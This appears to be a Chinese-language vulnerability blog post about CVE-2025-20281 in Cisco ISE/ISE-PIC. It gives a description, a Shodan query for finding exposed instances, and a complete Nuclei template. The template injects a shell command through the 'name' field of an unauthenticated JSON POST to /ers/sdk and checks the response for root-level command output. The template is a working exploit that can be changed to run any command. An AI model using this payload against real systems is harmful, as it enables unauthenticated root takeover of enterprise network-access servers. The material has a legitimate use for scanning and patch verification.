Cisco ISE/ISE-PIC Unauthenticated Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Cisco ISE/ISE-PIC Unauthenticated Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-20281

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Cisco ISE(Identity Services Engine)和ISE-PIC是思科公司提供的身份服务引擎产品,广泛用于企业网络中的身份验证、授权和审计服务。这些产品通常部署在企业级网络中,用于管理网络访问控制和策略执行。由于其广泛的应用,这些产品中的安全漏洞可能会对大量企业网络构成严重威胁。该漏洞是由于特定API中对用户提供输入的验证不足,导致未经身份验证的远程攻击者能够以root权限执行任意代码。这种类型的漏洞属于命令执行漏洞,其技术根源在于应用程序未能充分验证和清理用户输入,从而允许攻击者注入恶意命令。由于攻击者无需身份验证即可利用此漏洞,且能够执行任意代码,这意味着攻击者可以完全控制受影响的系统,导致数据泄露、服务中断或其他恶意活动。此漏洞的严重性在于其高利用性和潜在的大规模影响,尤其是在企业网络中。

产品厂商: Cisco

产品名称: Cisco ISE/ISE-PIC

搜索语法: html:”Identity Services Engine”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/fd14b07079f553ea291a76f371f11c7966323c4a/http%2Fcves%2F2025%2FCVE-2025-20281.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

id: CVE-2025-20281

info:
  name: Cisco ISE/ISE-PIC - Unauthenticated Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Cisco ISE and Cisco ISE-PIC contain a remote code execution vulnerability caused by insufficient validation of user-supplied input in a specific API, allowing unauthenticated remote attackers to execute arbitrary code as root.
  reference:
    - https://github.com/abrewer251/CVE-2025-20281-2-Cisco-ISE-RCE
    - https://github.com/grupooruss/CVE-2025-20281-Cisco
metadata:
    shodan-query: html:"Identity Services Engine"
  tags: cve,cve2025,cisco,ise,rce,unauth

variables:
  cmd: "id"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /admin/login.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - status_code == 200 && contains(body, "document.title =\'Identity Services Engine\';")
          - status_code == 403 && contains(body, "<title>Identity Services Engine</title>")

  - raw:
      - |
        POST /ers/sdk#_ HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        Connection: close

        {
        "InternalUser": {
        "name": "pwn; {{cmd}}; #",
        "password": "x",
        "changePassword": false
        }
        }

    matchers:
      - type: dsl
        dsl:
          - regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)
          - status_code == 200
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Cisco ISE/ISE-PIC Unauthenticated Remote Code Execution Vulnerability
http://example.com/2025/07/25/github_1044759235/
作者
lianccc
发布于
2025年7月25日
许可协议